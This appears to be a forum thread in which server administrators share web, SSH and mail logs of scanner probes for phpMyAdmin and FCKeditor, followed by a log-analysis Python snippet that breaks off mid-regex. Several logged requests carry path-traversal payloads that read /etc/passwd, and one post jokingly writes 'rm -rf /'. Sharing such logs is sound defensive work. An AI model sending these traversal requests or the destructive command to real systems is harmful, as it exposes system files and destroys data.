89.149.242.190 [22/Feb/2011:02:55:08 +0900] "GET /~/admin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:14 +0900] "GET /~/myadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:20 +0900] "GET /~/phpadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:26 +0900] "GET /~/phpmanager/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:32 +0900] "GET /~/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:38 +0900] "GET :2086/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1" 400 REF:-
89.149.242.190 [22/Feb/2011:02:55:44 +0900] "GET :2087/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1" 400 REF:-
89.149.242.190 [22/Feb/2011:02:55:50 +0900] "GET :81/phpmyadmin/scripts/setup.php HTTP/1.1" 400 REF:-
I thought attacks only happened in the movies.
And for the record, the user agent:
UA:ZmEu
They must really love phpmyadmin.
i125-202-167-50.s10.a029.ap.plala.or.jp
89.106.13.209 - - [24/Feb/2011:03:08:57 +0900] "GET //phpmyadmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:08:57 +0900] "GET //phpMyAdmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:08:58 +0900] "GET //admin/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:08:59 +0900] "GET //dbadmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:08:59 +0900] "GET //myadmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:00 +0900] "GET //mysql/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:01 +0900] "GET //mysqladmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:01 +0900] "GET //phpadmin/ HTTP/1.1" 403 211 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:02 +0900] "GET //pma/ HTTP/1.1" 403 206 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:03 +0900] "GET //phpdb/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:03 +0900] "GET //db/ HTTP/1.1" 403 205 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:04 +0900] "GET //mysqladmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:05 +0900] "GET //SQL/ HTTP/1.1" 403 206 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:05 +0900] "GET //padmin/ HTTP/1.1" 403 209 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:06 +0900] "GET //pmadmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:07 +0900] "GET //webdb/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
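Has this one already been posted?
Not so much already posted; it feels like they're just hitting everything they can by now.
But they haven't come to mine for a few weeks.
When the pma-related ones come, they come in one big batch.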
::1 - - [25/Feb/2011:04:07:33 +0900] "OPTIONS * HTTP/1.0" 200 - "-" "Apache (internal dummy connection)"
Are you blind?
77.222.43.19 - - [25/Feb/2011:22:57:37 +0900] "GET //phpmyadmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
77.222.43.19 - - [25/Feb/2011:22:57:38 +0900] "GET //phpMyAdmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
77.222.43.19 - - [25/Feb/2011:22:57:38 +0900] "GET //MyAdmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
77.222.43.19 - - [25/Feb/2011:22:57:41 +0900] "GET //myadmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
77.222.43.19 - - [25/Feb/2011:22:57:44 +0900] "GET //pma/ HTTP/1.1" 403 206 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
77.222.43.19 - - [25/Feb/2011:22:57:45 +0900] "GET //mysql/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
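I'm rejecting them with mod_geoip so there's no real harm, but they're back again.
The // thing is annoying, isn't it.
It makes me think, are they stupid?
No, they are stupid.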
195.7.10.56 [26/Feb/2011:13:38:52 +0900] GET //phpMyAdmin/scripts/setup.php HTTP/1.1 404 226
195.7.10.56 [26/Feb/2011:13:38:52 +0900] GET //phpMyAdmin1/scripts/setup.php HTTP/1.1 404 227
195.7.10.56 [26/Feb/2011:13:38:53 +0900] GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1 404 228
195.7.10.56 [26/Feb/2011:13:38:54 +0900] GET //phpadmin/scripts/setup.php HTTP/1.1 404 224
195.7.10.56 [26/Feb/2011:13:38:55 +0900] GET //phpmyadmin/scripts/setup.php HTTP/1.1 404 226
195.7.10.56 [26/Feb/2011:13:38:55 +0900] GET //phpmyadmin.old/scripts/setup.php HTTP/1.1 404 230
195.7.10.56 [26/Feb/2011:13:38:56 +0900] GET //old.phpmyadmin/scripts/setup.php HTTP/1.1 404 230
195.7.10.56 [26/Feb/2011:13:38:57 +0900] GET //phpmyadmin1/scripts/setup.php HTTP/1.1 404 227
195.7.10.56 [26/Feb/2011:13:38:58 +0900] GET //phpmyadmin-2/scripts/setup.php HTTP/1.1 404 228
195.7.10.56 [26/Feb/2011:13:38:58 +0900] GET //phpmyadmin1/scripts/setup.php HTTP/1.1 404 227
195.7.10.56 [26/Feb/2011:13:38:59 +0900] GET //phpmyadmin2/scripts/setup.php HTTP/1.1 404 227
195.7.10.56 [26/Feb/2011:13:39:00 +0900] GET //pma/scripts/setup.php HTTP/1.1 404 219
and things like
46.4.50.141 [27/Feb/2011:03:17:47 +0900] GET //lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 219
46.4.50.141 [27/Feb/2011:03:17:47 +0900] GET //newsletter/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 224
46.4.50.141 [27/Feb/2011:03:17:48 +0900] GET //news/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 218
46.4.50.141 [27/Feb/2011:03:17:49 +0900] GET //phplist/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 221
46.4.50.141 [27/Feb/2011:03:17:49 +0900] GET //phpList/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 221
46.4.50.141 [27/Feb/2011:03:17:50 +0900] GET //admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 213
46.4.50.141 [27/Feb/2011:03:17:50 +0900] GET //phplist/lsts/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 226
46.4.50.141 [27/Feb/2011:03:17:51 +0900] GET //phplists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 222
46.4.50.141 [27/Feb/2011:03:17:51 +0900] GET //list/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 212
get logged about once a day, I'd say.
They come at SSHD too.
reverse mapping checking getaddrinfo for 122.3.134.131.pldt.net [122.3.134.131]
failed - POSSIBLE BREAK-IN ATTEMPT! : 202 time(s)
reverse mapping checking getaddrinfo for 178-162-164-39.local [178.162.164.39]
failed - POSSIBLE BREAK-IN ATTEMPT! : 55 time(s)
Address 64.235.57.228 maps to lasvegas-nv-datacenter.com, but this does not map
back to the address - POSSIBLE BREAK-IN ATTEMPT! : 1 time(s)
# ping localhost
# rm -rf /
Attack on my mail server: 113.244.196.159
I'm rejecting more than 10,000 mails a day and they still don't learn, lol
193.252.15.94
lputeaux-151-43-28-94.w193-252.abo.wanadoo.fr
89.2.94.115
ip-115.net-89-2-94.rev.numericable.fr
51 :
162.78.3.110.ap.yournet.ne.jp: 2011/03/20 (Sun) 17:21:36.83 ID:Pnurn98q
So it's 162.78.3.110.ap.yournet.ne.jp, apparently
74.3.202.84 - - [20/Mar/2011:08:01:18 +0900] "HEAD /phpmyadmintting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
74.3.202.84 - - [20/Mar/2011:08:01:19 +0900] "HEAD //phpMyAdmin/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
74.3.202.84 - - [20/Mar/2011:08:01:19 +0900] "HEAD //admin/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
74.3.202.84 - - [20/Mar/2011:08:01:19 +0900] "HEAD //mysql/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
74.3.202.84 - - [20/Mar/2011:08:01:19 +0900] "HEAD //phpmyadmin2/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
74.3.202.84 - - [20/Mar/2011:08:01:20 +0900] "HEAD /epgrec/envSetting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
Go marry PMAN
Since a little after 21:00 last night, an endless attack on my SMTP server every 2 to 3 seconds
> "2011-04-04 21:15:49","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:15:51","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:15:53","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:15:55","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:15:57","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:00","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:02","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:04","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:06","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:08","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:10","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:12","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:14","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:16","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:18","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
(rest omitted)
Found something I hadn't seen before
> 2011/04/10,07:49:13,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/","","1.1",200,8097
> 2011/04/10,07:49:17,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:17,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fckeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:17,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fckeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/FCKeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/fckeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/FCKeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/FCKeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/FCKeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/FCKeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/fckeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/fckeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/FCKeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/FCKeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/fckeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/fckeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:23,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fck/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:23,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fck/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:23,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fck/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:23,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fck/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
49.212.19.24
www1230ub.sakura.ne.jp
49.212.21.126
www1102ud.sakura.ne.jp
58 :
DNS Unregistered-san: 2011/05/03 (Tue) 08:53:30.11 ID:qckZg2K9
41.89.28.4 - - [30/Apr/2011:14:35:13 +0900] "GET /webdav/test HTTP/1.1" 404 289 "-" "-"
217.243.187.36 - - [30/Apr/2011:23:45:49 +0900] "GET /webdav/test HTTP/1.1" 404 289 "-" "-"
81.201.60.163 - - [02/May/2011:05:29:09 +0900] "GET /sd/1M HTTP/1.1" 404 280 "-" "-"
195.246.217.24 - - [03/May/2011:07:51:26 +0900] "GET /user/soapCaller.bs HTTP/1.1" 404 296 "-" "Morfeus Fucking Scanner"
59 :
DNS Unregistered-san: 2011/05/04 (Wed) 17:04:25.73 ID:qh2JvQDF
123.30.109.21 - - [04/May/2011:17:00:57 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 319 "-" "ZmEu"
123.30.109.21 - - [04/May/2011:17:00:57 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 303 "-" "ZmEu"
123.30.109.21 - - [04/May/2011:17:00:58 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 403 310 "-" "ZmEu"
123.30.109.21 - - [04/May/2011:17:01:06 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 319 "-" "ZmEu"
123.30.109.21 - - [04/May/2011:17:01:07 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 303 "-" "ZmEu"
123.30.109.21 - - [04/May/2011:17:01:07 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 403 310 "-" "ZmEu"
123.30.109.21 - - [04/May/2011:17:02:07 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 319 "-" "ZmEu"
123.30.109.21 - - [04/May/2011:17:02:07 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 303 "-" "ZmEu"
123.30.109.21 - - [04/May/2011:17:02:07 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 403 310 "-" "ZmEu"
46.28.109.24 [2011.4/03-12:12:23 +0900] "GET //phpmyadmin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:12:23 +0900] "GET //phpMyAdmin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:12:29 +0900] "GET //dbadmin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:12:24 +0900] "GET //admin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:12:35 +0900] "GET //myadmin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:12:41 +0900] "GET //mysql/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:12:47 +0900] "GET //mysqladmin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:12:53 +0900] "GET //phpadmin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:12:59 +0900] "GET //pma/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:13:05 +0900] "GET //phpdb/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:13:11 +0900] "GET //db/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:13:17 +0900] "GET //mysqladmin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:13:23 +0900] "GET //SQL/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:13:29 +0900] "GET //padmin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:13:35 +0900] "GET //pmadmin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:13:41 +0900] "GET //webdb/ HTTP/1.1" 404 REF:-
113.140.75.222 [2011.4/03-19:45:58 +0900] "GET //phpmyadmin/ HTTP/1.1" 404 REF:-
113.140.75.222 [2011.4/03-19:45:59 +0900] "GET //phpMyAdmin/ HTTP/1.1" 404 REF:-
113.140.75.222 [2011.4/03-19:46:00 +0900] "GET //pma/ HTTP/1.1" 404 REF:-
113.140.75.222 [2011.4/03-19:46:05 +0900] "GET //dbadmin/ HTTP/1.1" 404 REF:-
113.140.75.222 [2011.4/03-19:46:11 +0900] "GET //myadmin/ HTTP/1.1" 404 REF:-
113.140.75.222 [2011.4/03-19:46:17 +0900] "GET //phppgadmin/ HTTP/1.1" 404 REF:-
113.140.75.222 [2011.4/03-19:46:23 +0900] "GET //PMA/ HTTP/1.1" 404 REF:-
113.140.75.222 [2011.4/03-19:46:29 +0900] "GET //admin/ HTTP/1.1" 404 REF:-
113.140.75.222 [2011.4/03-19:46:35 +0900] "GET //MyAdmin/ HTTP/1.1" 404 REF:-
212.58.96.55 [2011.4/13-01:55:54 +0900] "GET //phpmyadmin/ HTTP/1.1" 404 REF:-
212.58.96.55 [2011.4/13-01:55:54 +0900] "GET //phpMyAdmin/ HTTP/1.1" 404 REF:-
212.58.96.55 [2011.4/13-01:55:55 +0900] "GET //MyAdmin/ HTTP/1.1" 404 REF:-
212.58.96.55 [2011.4/13-01:56:01 +0900] "GET //myadmin/ HTTP/1.1" 404 REF:-
212.58.96.55 [2011.4/13-01:56:07 +0900] "GET //pma/ HTTP/1.1" 404 REF:-
212.58.96.55 [2011.4/13-01:56:13 +0900] "GET //mysql/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:03 +0900] "GET //phpmyadmin/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:04 +0900] "GET //phpMyAdmin/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:05 +0900] "GET //pma/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:10 +0900] "GET //dbadmin/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:16 +0900] "GET //myadmin/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:22 +0900] "GET //phppgadmin/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:28 +0900] "GET //PMA/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:34 +0900] "GET //admin/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:41 +0900] "GET //MyAdmin/ HTTP/1.1" 404 REF:-
123.30.109.21 [2011.4/20-13:22:53 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
123.30.109.21 [2011.4/20-13:22:52 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
123.30.109.21 [2011.4/30-00:16:47 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
123.30.109.21 [2011.4/30-00:16:48 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
123.30.109.21 [2011.4/30-00:16:48 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
113.57.252.72 [2011.5/04-11:08:05 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
113.57.252.72 [2011.5/04-11:08:05 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
113.57.252.72 [2011.5/04-11:08:06 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
113.57.252.72 [2011.5/04-11:08:07 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
113.57.252.72 [2011.5/04-11:08:12 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
I wonder what they're after in phpadmin?
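Added example, not part of any post in the thread: one way to pick sweeps like the ones logged above out of an Apache access log. It flags a source address once it requests several distinct admin-panel probe paths inside a short window, and lists any probed path that answered with something other than 404. The path patterns are taken from the requests quoted in this thread; the threshold, the window, the function names and the sample log lines (documentation-range addresses) are assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache common/combined log line, the format most posts in the thread use.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
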